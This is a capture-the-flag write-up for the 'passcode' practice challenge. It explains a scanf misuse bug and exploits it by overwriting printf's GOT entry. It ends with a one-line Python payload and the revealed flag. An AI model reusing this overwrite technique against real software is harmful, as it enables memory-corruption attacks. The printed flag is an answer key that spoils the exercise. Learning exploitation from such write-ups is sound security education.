Toddler's Bottle - passcode

SCP the code and executable file first:

flora@kali:~/Downloads$ scp -P 2222 [email protected]:/home/passcode/passcode ./
[email protected]'s password: 
passcode                                       100% 7485    45.2KB/s   00:00    
flora@kali:~/Downloads$ scp -P 2222 [email protected]:/home/passcode/passcode.c ./
[email protected]'s password: 
passcode.c                                     100%  858     6.0KB/s   00:00

Code:

void login(){
    int passcode1;
    int passcode2;

    printf("enter passcode1 : ");
    scanf("%d", passcode1);
    fflush(stdin);

    // ha! mommy told me that 32bit is vulnerable to bruteforcing :)
    printf("enter passcode2 : ");
        scanf("%d", passcode2);

    printf("checking...\n");
    if(passcode1==338150 && passcode2==13371337){
                printf("Login OK!\n");
                system("/bin/cat flag");
        }
        else{
                printf("Login Failed!\n");
        exit(0);
        }
}

void welcome(){
    char name[100];
    printf("enter you name : ");
    scanf("%100s", name);
    printf("Welcome %s!\n", name);
}

int main(){
    printf("Toddler's Secure Login System 1.0 beta.\n");

    welcome();
    login();

    // something after login...
    printf("Now I can safely trust you that you have credential :)\n");
    return 0;    
}

Look at the code, "scanf" is used to get the passcode: scanf("%d", passcode1); scanf("%d", passcode2)

scanf: Reads data from stdin and stores them according to the parameter format into the locations pointed by the additional arguments. The additional arguments should point to already allocated objects of the type specified by their corresponding format specifier within the format string.

Note that passcode1 and passcode2 are integers. So the scanf function should be:scanf("%d", &passcode1); scanf("%d", &passcode2). Now without the "&" symbol, the function will consider the integer as address and put the user input into the memory pointed by that address.

Variable addresses:

name: [ebp-0x70]

passcode1: [ebp-0x10]

passcode2: [ebp-0xc]

Note this code: char name[100]. passcode1 and passcode2 are integers, each of them is 4bytes. Calculate the offset, passcode1 - name = 0x70 - 0x10 = 0x60 = 96bytes. So passcode1 occupies the last four bytes of name array.

After comparison: if(passcode1==338150 && passcode2==13371337), the system() function is called. In order to call system(), we can overwrite a function in the Global Offset Table (GOT). What are the functions called before system()? We have printf(), fflush(). I choose printf() function to overwrite.

**credits: got and plt tables for pwning**

Solution:

python -c "print ('A'*96+'\x00\xa0\x04\x08'+'134514147')" | ./passcode

Flag: Sorry mom.. I got confused about scanf usage :(

5.passcode

Toddler's Bottle - passcode

results matching ""

No results matching ""